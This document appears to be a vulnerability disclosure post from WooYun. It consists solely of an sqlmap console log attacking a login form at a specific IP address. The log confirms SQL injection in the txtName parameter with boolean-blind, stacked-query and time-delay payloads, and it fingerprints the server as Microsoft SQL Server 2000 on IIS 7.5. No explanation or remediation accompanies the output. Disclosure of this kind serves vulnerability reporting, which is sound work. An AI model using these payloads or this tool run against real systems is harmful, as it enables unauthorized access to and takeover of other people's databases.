WooYun.org

[root@Hacker~]# Sqlmap -u "123.234.41.55" --data "txtName=aaaa"
    sqlmap/1.0-dev - automatic SQL injection and database takeover tool
    http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutua
 consent is illegal. It is the end user's responsibility to obey all applicable
local, state and federal laws. Developers assume no liability and are not respo
sible for any misuse or damage caused by this program
[*] starting at 12:58:34
[12:58:34] [INFO] parsing HTTP request from '1.txt'
[12:58:35] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requ
sts:
---
Place: POST
Parameter: txtName
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=JhXV2AWIfuIGktA8ofkpb5
PvPwbvt8S7rEEtXXZOl7jS1l7vP1WXzueKa4qzEXloT2HwIEPsngDD1MquUnr6VZ10P/ImR1NHPex07
IwRKniwTnE/TtuZLMqHrnV7ehw6dtzgvNj+z8ldpXPdyd2iE9L/SQmSsvFMF6Y/eCJuw=&__VIEWSTA
EGENERATOR=C2EE9ABB&__EVENTVALIDATION=s4hmTU/mT7FbzKebJAWsxORyZ9Nh1GWPT5/4MJDnT
pTX++/Y4nS+4siOYMZ8tFpcBAwbKga4N9rFcuqdOjZgpFfy7mJguofK49tnbm+QD1a1nHOhnita7Mri
Igbb/za7VB/8M03ZF4aIxqVe9jXDFB9GHAvctojg+8WwHPz5InGL293mf7QqpSQwTQy4X2xDugYuW4x
7EL7NWPQYxGA==&txtName=aaaa%' AND 5875=5875 AND '%'='&txtPwd=aaaaaa&txtCode=krp
&bthLogin.x=64&bthLogin.y=10
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=JhXV2AWIfuIGktA8ofkpb5
PvPwbvt8S7rEEtXXZOl7jS1l7vP1WXzueKa4qzEXloT2HwIEPsngDD1MquUnr6VZ10P/ImR1NHPex07
IwRKniwTnE/TtuZLMqHrnV7ehw6dtzgvNj+z8ldpXPdyd2iE9L/SQmSsvFMF6Y/eCJuw=&__VIEWSTA
EGENERATOR=C2EE9ABB&__EVENTVALIDATION=s4hmTU/mT7FbzKebJAWsxORyZ9Nh1GWPT5/4MJDnT
pTX++/Y4nS+4siOYMZ8tFpcBAwbKga4N9rFcuqdOjZgpFfy7mJguofK49tnbm+QD1a1nHOhnita7Mri
Igbb/za7VB/8M03ZF4aIxqVe9jXDFB9GHAvctojg+8WwHPz5InGL293mf7QqpSQwTQy4X2xDugYuW4x
7EL7NWPQYxGA==&txtName=aaaa%'; WAITFOR DELAY '0:0:5';--&txtPwd=aaaaaa&txtCode=k
pi&bthLogin.x=64&bthLogin.y=10
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=JhXV2AWIfuIGktA8ofkpb5
PvPwbvt8S7rEEtXXZOl7jS1l7vP1WXzueKa4qzEXloT2HwIEPsngDD1MquUnr6VZ10P/ImR1NHPex07
IwRKniwTnE/TtuZLMqHrnV7ehw6dtzgvNj+z8ldpXPdyd2iE9L/SQmSsvFMF6Y/eCJuw=&__VIEWSTA
EGENERATOR=C2EE9ABB&__EVENTVALIDATION=s4hmTU/mT7FbzKebJAWsxORyZ9Nh1GWPT5/4MJDnT
pTX++/Y4nS+4siOYMZ8tFpcBAwbKga4N9rFcuqdOjZgpFfy7mJguofK49tnbm+QD1a1nHOhnita7Mri
Igbb/za7VB/8M03ZF4aIxqVe9jXDFB9GHAvctojg+8WwHPz5InGL293mf7QqpSQwTQy4X2xDugYuW4x
7EL7NWPQYxGA==&txtName=aaaa%' WAITFOR DELAY '0:0:5'--&txtPwd=aaaaaa&txtCode=krp
&bthLogin.x=64&bthLogin.y=10
---
[12:58:35] [INFO] testing MySQL
[12:58:35] [WARNING] the back-end DBMS is not MySQL
[12:58:35] [INFO] testing Oracle
[12:58:35] [WARNING] the back-end DBMS is not Oracle
[12:58:35] [INFO] testing PostgreSQL
[12:58:35] [WARNING] the back-end DBMS is not PostgreSQL
[12:58:35] [INFO] testing Microsoft SQL Server
[12:58:36] [INFO] confirming Microsoft SQL Server
[12:58:37] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 7.5
back-end DBMS: Microsoft SQL Server 2000
[12:58:37] [WARNING] HTTP error codes detected during testing:
500 (Internal Server Error) - 2 times
[12:58:37] [WARNING] cannot properly display Unicode characters inside Windows
S command prompt (http://bugs.python.org/issue1602). All unhandled occurances w
ll result in replacement with '?' character. Please, find proper character repr
sentation inside corresponding output files.
[12:58:37] [INFO] fetched data logged to text files under 'F:\1937CN~1\VStart50
tools\????\SQLMAP~2\Bin\output\123.234.41.55'
[*] shutting down at 12:58:37
[root@Hacker~]# Sqlmap